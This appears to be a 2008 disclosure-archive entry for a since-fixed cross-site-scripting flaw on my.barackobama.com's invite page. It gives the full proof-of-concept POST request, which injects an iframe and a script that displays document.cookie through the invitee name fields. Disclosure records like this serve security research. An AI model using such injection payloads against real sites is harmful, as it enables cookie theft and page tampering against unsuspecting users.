Security researcher mox, has submitted on 18/04/2008 a cross-site-scripting (XSS) vulnerability affecting my.barackobama.com, which at the time of submission ranked 1228 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/04/2008. It is currently fixed. |
Date submitted: 18/04/2008 |
Date published: 18/04/2008 |
Date fixed: 23/04/2008 | Status: FIXED |
Author: mox |
Domain: my.barackobama.com |
Category: XSS |
Pagerank: 1228 |
URL: http://my.barackobama.com/page/socialnet/invite |
POST: email_count=5&bsd_drl=&invitee%5B0%5D%5Bemail%5D=g%40g.com&invitee%5B0%5D%5Bfirstname%5D=%3Ciframe+s rc%3Dhttp%3A%2F%2Fgoogle.com%3E%3C%2Fiframe%3E&invitee%5B0%5D%5Blastname%5D=%3Cscript%3Ealert%28docu ment.cookie%29%3B%3C%2Fscript%3E&invitee%5B1%5D%5Bemail%5D=&invitee%5B1%5D%5Bfirstname%5D=&invitee%5 B1%5D%5Blastname%5D=&invitee%5B2%5D%5Bemail%5D=&invitee%5B2%5D%5Bfirstname%5D=&invitee%5B2%5D%5Blast name%5D=&invitee%5B3%5D%5Bemail%5D=&invitee%5B3%5D%5Bfirstname%5D=&invitee%5B3%5D%5Blastname%5D=&inv itee%5B4%5D%5Bemail%5D=&invitee%5B4%5D%5Bfirstname%5D=&invitee%5B4%5D%5Blastname%5D=¬e=%22%3E%0D% 0A |
Click here to view the mirror
|
|
|